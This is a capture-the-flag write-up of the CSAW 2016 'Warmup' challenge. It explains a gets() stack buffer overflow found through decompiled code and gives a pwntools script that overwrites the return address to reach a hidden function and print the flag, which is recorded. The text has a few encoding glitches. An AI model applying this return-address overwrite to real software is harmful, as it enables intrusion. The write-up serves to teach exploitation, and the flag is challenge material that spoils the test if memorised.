Description:
So you want to be a pwn-er huh? Well let’s throw you an easy one š
nc pwn.chal.csaw.io 8000
Let’s connect to the server and play with it a little bit:
[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000 -Warm Up- WOW:0x40060d >Beet [Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000 -Warm Up- WOW:0x40060d >Beetttttttttttttttttttttt [Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000 -Warm Up- WOW:0x40060d >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
The program says “WOW:” followed by a memory address. This address is probably the address of the function we need to execute. Let’s open IDA to view the code:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [sp+0h] [bp-80h]@1
char v5; // [sp+40h] [bp-40h]@1
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
sprintf(&s, "%p\n", 4195853LL);
write(1, &s, 9uLL);
write(1, (const void *)'@\aU', 1uLL);
return gets(&v5, '>');
}b
This is a classic BOF (Buffer Overflow) case. The main methodĀ uses theĀ gets() function toĀ receive theĀ given inputĀ and returns it. gets() is storingĀ 64 characters (40h). Because there is no validation of the given string we need to supply an input that will exploit the program and make it jump to the wanted address:Ā 0x40060d.
A short python script will do the job:
from pwn import *
r = remote('pwn.chal.csaw.io', 8000)
print r.recv()
r.sendline("A"*72 + "\x0D\x06\x40\x00\x00\x00\x00\x00")
print r.recvline()
And we got the flag: FLAG{LET_US_BEGIN_CSAW_2016}
Eat Veggies